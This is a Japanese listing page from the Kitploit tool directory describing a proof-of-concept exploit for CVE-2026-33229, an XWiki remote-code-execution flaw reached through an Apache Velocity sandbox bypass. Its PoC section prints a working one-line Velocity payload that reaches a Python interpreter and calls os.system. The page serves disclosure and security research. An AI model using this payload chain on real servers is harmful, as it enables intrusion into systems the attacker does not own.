Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-33229 — # CVE-2026-33229の概念実証エクスプロイト Apache VelocityサンドボックスバイパスによるXWiki RCE(リモートコード実行)の概念実証エクスプロイト。技術的な詳細と動作するペイロードを含みます。 | Kitploit
ツール/GitHubGitHub/azefzafyoussef/cve-2026-33229
脆弱性分析エクスプロイトウェブアプリケーション悪用ペイロード開発
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

# CVE-2026-33229の概念実証エクスプロイト Apache VelocityサンドボックスバイパスによるXWiki RCE(リモートコード実行)の概念実証エクスプロイト。技術的な詳細と動作するペイロードを含みます。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-33229 — Apache Velocity サンドボックス回避による XWiki RCE

CVE Severity Status

XWiki Platform におけるリモートコード実行の脆弱性です。スクリプト権限を持つ認証済みユーザーが、Velocity コンテキスト内に既に存在する事前インスタンス化されたオブジェクトを走査することで、Java Reflection を一切必要とせずに Apache Velocity サンドボックスを完全に回避できます。

📄 完全な技術詳細: youssefazefzaf.com/posts/cve


詳細

フィールド値
CVE IDCVE-2026-33229
影響を受ける製品XWiki Platform
コンポーネントVelocity マクロレンダラー、ページタイトルパラメータ
必要な権限認証済み + スクリプト権限
影響リモートコード実行
GHSAGHSA-h259-74h5-4rh9
発見日2025年11月7日
パッチ適用日2025年12月10日
公開日2026年4月8日

概念実証

root@kitploit:~
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

責任ある開示に関する通知: PoC はパッチ公開後に公開されています。 所有していないシステムに対して使用しないでください。

ツールをダウンロード